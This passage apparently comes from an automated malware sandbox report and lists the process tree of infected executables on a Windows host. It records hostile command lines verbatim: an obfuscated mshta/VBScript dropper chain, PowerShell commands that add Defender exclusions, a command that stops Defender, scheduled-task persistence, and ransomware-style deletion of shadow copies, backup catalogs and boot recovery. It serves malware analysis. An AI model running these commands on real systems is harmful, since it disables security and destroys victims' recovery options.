- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12376
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14776
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9836
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15120
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10116
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8308
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14424
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3936
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11568
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:15016
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:6160
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8216
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:16344
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:9496
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10780
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13996
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:8904
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12916
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:11552
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3400
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10300
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10876
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5988
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12248
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:14800
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 14800 -s 28
      4⤵
      Program crash
      PID:14576
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10408
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:7272
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:13824
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:3916
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:12848
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:10920
- - C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    C:\Users\Admin\Documents\xUhCEE_8ET1Pwkmoq3M7wp9n.exe
    3⤵
    PID:5312
- C:\Users\Admin\Documents\4ARkdH7P9Gc2KhPW6gimni5x.exe
  "C:\Users\Admin\Documents\4ARkdH7P9Gc2KhPW6gimni5x.exe"
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 316
    3⤵
    - Drops file in Windows directory
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1272
- C:\Users\Admin\Documents\w0dEcC96zrOkgEozCmWR_ohX.exe
  "C:\Users\Admin\Documents\w0dEcC96zrOkgEozCmWR_ohX.exe"
  2⤵
  - Executes dropped EXE
  PID:1300
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\w0dEcC96zrOkgEozCmWR_ohX.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\w0dEcC96zrOkgEozCmWR_ohX.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:3744
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\w0dEcC96zrOkgEozCmWR_ohX.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\w0dEcC96zrOkgEozCmWR_ohX.exe" ) do taskkill -F -im "%~NxQ"
      4⤵
      PID:3204
    - - C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
        
        BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
        5⤵
        Executes dropped EXE
        
        PID:5604
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
        6⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
        7⤵
        
        PID:4628
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
        6⤵
        Loads dropped DLL
        
        PID:5668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -im "w0dEcC96zrOkgEozCmWR_ohX.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5852
- C:\Users\Admin\Documents\luVc3NOWeOV05DUtbvpIs_eO.exe
  "C:\Users\Admin\Documents\luVc3NOWeOV05DUtbvpIs_eO.exe"
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
  PID:2540
- - C:\Users\Admin\AppData\Local\Temp\b3c301f4-c838-4a5e-a80e-c372b04ba135\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\b3c301f4-c838-4a5e-a80e-c372b04ba135\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b3c301f4-c838-4a5e-a80e-c372b04ba135\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b3c301f4-c838-4a5e-a80e-c372b04ba135\test.bat"
      4⤵
      PID:5944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\luVc3NOWeOV05DUtbvpIs_eO.exe" -Force
    3⤵
    PID:1460
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Executes dropped EXE
      PID:2504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\luVc3NOWeOV05DUtbvpIs_eO.exe" -Force
    3⤵
    PID:2388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    3⤵
    PID:3988
- C:\Users\Admin\Documents\8W2fTZIx35tdQbLDIrRV5yIU.exe
  "C:\Users\Admin\Documents\8W2fTZIx35tdQbLDIrRV5yIU.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1716
- - C:\Users\Admin\Documents\8W2fTZIx35tdQbLDIrRV5yIU.exe
    "C:\Users\Admin\Documents\8W2fTZIx35tdQbLDIrRV5yIU.exe"
    3⤵
    PID:5820
- C:\Users\Admin\Documents\ZZEMxT4VOgk9J207q810gJi9.exe
  "C:\Users\Admin\Documents\ZZEMxT4VOgk9J207q810gJi9.exe"
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4980
- C:\Users\Admin\Documents\MZbwd0y9OyFKPNNcEtm0LSBw.exe
  "C:\Users\Admin\Documents\MZbwd0y9OyFKPNNcEtm0LSBw.exe"
  2⤵
  PID:4284
- C:\Users\Admin\Documents\n3mnYKwrgubfs7czfiObbTJR.exe
  "C:\Users\Admin\Documents\n3mnYKwrgubfs7czfiObbTJR.exe"
  2⤵
  - Executes dropped EXE
  PID:4632
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\N3MNYK~1.DLL,s C:\Users\Admin\DOCUME~1\N3MNYK~1.EXE
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in Program Files directory
    PID:6008
  - - C:\Windows\SysWOW64\RUNDLL32.EXE
      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\N3MNYK~1.DLL,cypJZ1U=
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      PID:4480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\N3MNYK~1.DLL
        5⤵
        
        PID:8060
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp957D.tmp.ps1"
        5⤵
        
        PID:7524
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpFADB.tmp.ps1"
        5⤵
        
        PID:9068
      - C:\Windows\SysWOW64\nslookup.exe
        
        "C:\Windows\system32\nslookup.exe" -type=any localhost
        6⤵
        
        PID:8244
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
        5⤵
        
        PID:7980
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
        5⤵
        
        PID:988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 852
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:5720
- C:\Users\Admin\Documents\VVy_cFNNV4Eoaa6NMZgiG5N6.exe
  "C:\Users\Admin\Documents\VVy_cFNNV4Eoaa6NMZgiG5N6.exe"
  2⤵
  - Executes dropped EXE
  PID:2248
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 244
    3⤵
    - Program crash
    PID:6244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:1164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1436 -ip 1436
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2420 -ip 2420
1⤵
PID:3940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4820 -ip 4820
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5920

C:\Windows\system32\sc.exe
sc stop windefend
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5672 -ip 5672
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5404

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5368
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:3472
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 452
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3668 -ip 3668
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3472 -ip 3472
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1900 -ip 1900
1⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1776 -ip 1776
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2096 -ip 2096
1⤵
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5912 -ip 5912
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2248 -ip 2248
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6924

C:\Users\Admin\AppData\Local\Temp\4ADB.exe
C:\Users\Admin\AppData\Local\Temp\4ADB.exe
1⤵
PID:576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 6716 -ip 6716
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4716

C:\Users\Admin\AppData\Local\Temp\A8FA.exe
C:\Users\Admin\AppData\Local\Temp\A8FA.exe
1⤵
PID:2584
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 236
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:6400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1876 -ip 1876
1⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\14.exe
C:\Users\Admin\AppData\Local\Temp\14.exe
1⤵
PID:2248
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 236
  2⤵
  - Program crash
  PID:876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6008 -ip 6008
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3900

C:\Users\Admin\AppData\Local\Temp\5411.exe
C:\Users\Admin\AppData\Local\Temp\5411.exe
1⤵
PID:6916
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 240
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:6988

C:\Users\Admin\AppData\Local\Temp\25F9.exe
C:\Users\Admin\AppData\Local\Temp\25F9.exe
1⤵
PID:7316
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
  2⤵
  PID:8164

C:\Users\Admin\AppData\Local\Temp\227D.exe
C:\Users\Admin\AppData\Local\Temp\227D.exe
1⤵
- Adds Run key to start application
PID:7292
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
  2⤵
  PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1960
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:9200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:3308
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:3764
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2220
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:9160
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
    3⤵
    PID:6324
- - C:\Windows\SysWOW64\notepad.exe
    notepad.exe
    3⤵
    PID:13932
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 2656
  2⤵
  - Program crash
  PID:7508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5684 -ip 5684
1⤵
PID:7268

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6052

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5592
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 876
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3940

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3600

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7180

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7424

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:816

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6960

C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
1⤵
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5592 -ip 5592
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7832

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3636

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2584 -ip 2584
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2248 -ip 2248
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6916 -ip 6916
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5860 -ip 5860
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 8024 -ip 8024
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7476 -ip 7476
1⤵
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2924 -ip 2924
1⤵
PID:5756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 8184 -ip 8184
1⤵
PID:6532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7292 -ip 7292
1⤵
PID:3232

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 3056 -ip 3056
1⤵
PID:7480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8576 -ip 8576
1⤵
PID:8848

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4200 -ip 4200
1⤵
PID:2164

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 1236 -ip 1236
1⤵
PID:4868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4764 -ip 4764
1⤵
PID:6360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4772 -ip 4772
1⤵
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5612 -ip 5612
1⤵
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 584 -ip 584
1⤵
PID:7524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5180 -ip 5180
1⤵
PID:8764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5412 -ip 5412
1⤵
PID:8328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 9268 -ip 9268
1⤵
PID:9772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 14348 -ip 14348
1⤵
PID:14892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 14532 -ip 14532
1⤵
PID:14580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7456 -ip 7456
1⤵
PID:10384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 15136 -ip 15136
1⤵
PID:11748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 9828 -ip 9828
1⤵
PID:14700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 12536 -ip 12536
1⤵
PID:7620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 16224 -ip 16224
1⤵
PID:9504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 14788 -ip 14788
1⤵
PID:10524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5224 -ip 5224
1⤵
PID:12828

